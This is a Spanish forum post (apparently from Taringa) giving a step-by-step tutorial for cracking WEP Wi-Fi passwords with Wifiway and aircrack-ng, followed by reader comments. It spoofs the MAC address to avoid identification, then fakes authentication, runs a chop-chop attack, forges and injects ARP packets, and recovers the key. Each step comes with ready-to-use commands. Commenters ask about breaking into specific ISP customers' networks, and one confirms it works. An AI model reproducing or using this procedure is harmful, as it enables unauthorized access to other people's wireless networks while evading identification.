El post que buscas se encuentra eliminado, pero este también te puede interesar

Hackear WiFi + Wifiway 2.0.1 + Aircrack + Clave WEP

Buenas Taringeros!!

Este manual está orientado ,sobretodo, para gente que quiera aprender a generar tráfico cuando no hay ningún cliente asociado al punto de acceso (o red wifi), (si no hay clientes no hay tráfico), y a hackearla, para sacar una clave WEP. Funciona

Recomiendo leer antes, los otros dos manuales:
* Wifiway 2.0.1 + USB Arrancable
* Instalación Wifiway 2.0.1 USB

Para empezar, es necessario que nuestra tarjeta de red Wireless, esté correctamente instalada y sus respectivos drivers. En este manual no enseñare a instalarlos ya que llevaria mucho tiempo y seria necessario otro manual (casi todas las tarjetas funcionan sin tener que instalar nada manualmente)
Vamos empezar!

Cambiamos la identidad
Es muy importante, que cuando realizamos este tipo de cosas no nos identifiquen. Así pues veamos como podemos cambiar nuestra "identidad" del portátil o pc.
Nota: Este manual va dirigido solamente a la gente que usa Wifiway 2.0.1 o una distribución GNU/Linux parecida.

Abrimos una terminal y buscamos las interfaces:
ifconfig
Comprovamos pues que tengamos la interface Wlan0
Para cambiar su identidad (MAC):
ifconfig wlan0 down
macchanger -m 00:01:02:03:04:05 wlan0
nota: puede ser cualquiera MAC yo le puesto esa.
ifconfig wlan0 up

Tarjeta a modo monitor

Con la misma terminal abierta, tecleamos:
airmon-ng start wlan0
(mode monitor enabled) mon0
Nos saldra que se habra activado mode monitor enabled y su interfaz mon0.

Airodump para detección de redes wifi
Ahora vamos a localizar las AP (routers o acces points)
Abrimos airodump-ng, desde Inicio/Wifiway/suite/airodump-ng y escogemos la interfaz mon0.

Vemos todos los wifis que hay a nuestro alrededor, apuntamos el canal que usa el wifi que queremos auditar así como el bssid y el ssid de dicha red wifi.

Ahora abrimos una consola (o terminal) y ponemos lo siguiente:
airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA

Ejemplo:
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura mon0

Dejamos este terminal abierto hasta el final, no lo cerréis.

Nos asociamos a la red wifi
Ahora procedemos a asociarnos al AP con la MAC falseada que hemos hecho antes.

aireplay-ng -1 10 -e SSID -a BSSID -h MAC QUE TENEMOS (FALSA)

Ejemplo:
aireplay-ng -1 10 -e WLAN_05 -a 00:02:CF:13:41 -h 00:01:02:03:04:05 mon0

Dejamos esta consola abierta, igual que la de airodump, NO LAS CERRÉIS!!!

Lanzamos el ataque chop chop
Como que para descifrar la contraseña de clave WEP, necesitamos que circule mucho tráfico,vamos a tener que generar nosotros mismos el tráfico. Para que aumente la #Data (trafico de paquetes) al máximo. Logicamente solo si vemos des de la ventana de airodump-ng que hicimos la Data sube lenta...

Abrimos la consola y ponemos:

aireplay-ng -4 -h MAC QUE TENEMOS (FALSA)

Nota: Nos pedirá que si queremos ese paquete WEP que ha cogido, debemos mirar que el BSSID que tiene es el mismo que el que hemos seleccionado nosotros, si lo es, ponemos y le damos a enter, entonces comenzará el proceso (tarda 1 minuto aproximadamente), cuando termine creará dos ficheros en root, uno con extensión .CAP y otro con extensión .XOR.

No cerréis la consola, porque si lo hacéis luego os tiraréis de los pelos…

Saber la IP de la red wifi
Ahora vamos a ver qué IP usa nuestra WIFI, si ya sabemos que es la de toda la vida (192.168.1.1) podemos saltarnos este paso.

tcpdump -s 0 -n -e -r ARCHIVO.CAP

Nota:Como el nombre del archivo .cap es tan largo, copiamos (de la consola anterior) y pegamos aquí. Pulsamos intro y os saldrán muchas cosas, aunque identificaréis fácilmente la IP de la red wifi.

Repito, casi siempre es 192.168.1.1 !!!

Fabricar paquete ARP para inyectarlo

Para aumentar la #Data, fabricaremos un paquete ARP con los datos del AP(router) y los nuestros para posteriormente inyectarlo con aireplay.

packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar y pegar del terminal abierto de antes) -w NOMBRE PAQUETE

Nota: La IP del rango, puede ser inventada siempre y cuando respete la MAC. Puede ser de la 192.168.1.2 a la 192.168.1.254
Nombre del paquete, puede ser cualquiera, como en el ejemplo.

Ejemplo:
packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k 192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w paquete

Inyección del paquete ARP fabricado
Procedemos a la inyección del paquete ARP fabricado anteriormente para conseguir IVs(#DATA):

aireplay-ng -2 -x 1024 -h MAC QUE TENEMOS (FALSA) -r ARCHIVO ARP FORJADO

Y le damos a enter, nos dirá que si queremos usarlo, ponemos y le damos a enter para confirmar.

Ejemplo:
aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r paquete mon0

Nota: Como veis donde pone 1024 es recomendable poner primero 600, eso es porque algunos AP no soportan tanto tráfico y se saturan, yo empezaría por 600 y luego subiendo de a más, hasta llegar a lo máximo (1024), en este caso, yo llegué a 1024 y no tuve ningún problema. Con 600 va de perlas también.

Esperar a que haya suficientes IVs(#Data)
Ahora esperamos hasta que los #data de la pantalla del airodump (la que NO hemos cerrado antes) suban hasta un número decente.

Como sube rápido y no nos cuesta nada esperar, yo lo dejaría hasta llegar al millón (para asegurarnos que la clave la podrá sacar aircrack).

Ejecutamos Aircrack-ng para conseguir la clave
Ahora ejecutamos aircrack para conseguir la clave, abrimos otra consola y ponemos:

aircrack-ng captura-01.cap

Nota: El archivo .cap es el que utilizamos en el paso "Airodump para detección de redes wifi"

Y listo, esperamos unos minutos y veremos nuestra recompensa "KEY FOUND"
Te la dejara con HEXADECIMAL(números) y ASCII(letras y números)

Si tenéis alguna duda no dudeis en preguntar.


Más adelante subo fotos...

29 comentarios - Hackear WiFi + Wifiway 2.0.1 + Aircrack + Clave WEP

@eliofod -7
AMIGO ESTO ES UN POST MUY BUENO......TAL VES DEMASIADO Y ME LLEBA A PENSAR QUE ES UN RE-PROSTRE POR ESSO NO TE DOY PUNTOS
@bubulubu2012 -1
fijate te ganaste tus 10

sirve para bt4 supongo
@seba24000
no es repost
No me quedan puntos
pero lo recomiendo para que alguno de mis 130 seguidores lo pueda ver y dejarte
@chetita10
USA EL BEINI SOLO CON UNOS CLIKS SACAS UNA CLAVE WEP SIN TENER QUE HACER TODO ESTE EMBROLLO....
@luis987 -1
sirve para chingar claves de infinitum?
@supertuntun
odio los sistemas operativos para obtener claves de wifi con una interfas basica que parece ms2 sin imajenes sin botones con escritura que si te equivocas en una palabra el comando ya no es etc.....yo hace mucho tiempo que me deje de incomodar ahora tengo beini de linux 100% Comodo facil ligero y seguro obtiene claves wifi con sus 3 formas de atakes totalmente graficas
@supertuntun
posdata esto lo comento con intension de que cabies a una interfas mas comoda
@supertuntun
krotus dijo:Me parece logico que quieras dar tu opinion sobre este sistema, bien por ti si te gusta hacer las cosas sin complicarte la vida. Pero yo prefiero hacer las cosas manualmente, por que así aprendo y entiendo más bien lo que estoy haciendo, que no con simples botones.

supertuntun dijo:posdata esto lo comento con intension de que cabies a una interfas mas comoda


Ok
@Karvaky
Sobre los IVs he comprobado que para redes infinitum de mexico solo se necesitan 20mil IVs ya que son claves simples hexadecimales de 12 digitos
@haoa2
espero sirva!!! Grax....xD
@Armin_nyman
hola, no tienes los links de descarga¿?
@nicoapelta90
capo,no puedo sacar el interfaz de mi pc,lo intente con el "Windows power shell" y me dice q no lo reconoce como un cmdlet...deciem como hago para poder sacar el interfaz xfa,tengo W7 home premium 64 bits...
@marloco2 +1
eliofod dijo:AMIGO ESTO ES UN POST MUY BUENO......TAL VES DEMASIADO Y ME LLEBA A PENSAR QUE ES UN RE-PROSTRE POR ESSO NO TE DOY PUNTOS

lleva
@stefanno19
luis987 dijo:sirve para chingar claves de infinitum?


si sirve para eso
@romantic23
una imagen vale mas que mil palabras, podrias poner imagenes?
@robaloso
Ni modo debo hacer el tutorial para hacer lo mismo pero con backtrack5 r2 de hecho todos estos programas los trae el bactrack solo que con menos de la 1/4 parte de comandos se consigue la wepkey
de todas maneras te doy. +5 puntotes
@ppkikinho
hola lo quiero instalar desde un cd solo quemo los archivos??
@moroyoqui
con este soft se puede hackear un cisco d-link dir 600?
@caindependiente97
Holaaa! cuando llego al ante ultimo paso me dice que que capturo 1 ivs solo, que hice mal?
@krotus
Sino logras suficientes 1 ivs no podras sacar nunca la contraseña. Trata de hacer bien los pasos para la inyección de paquetes ARP para aumentar el trafico de red, o de lo contrario, trata de sacarla cuando haya mas clientes conectados a la red.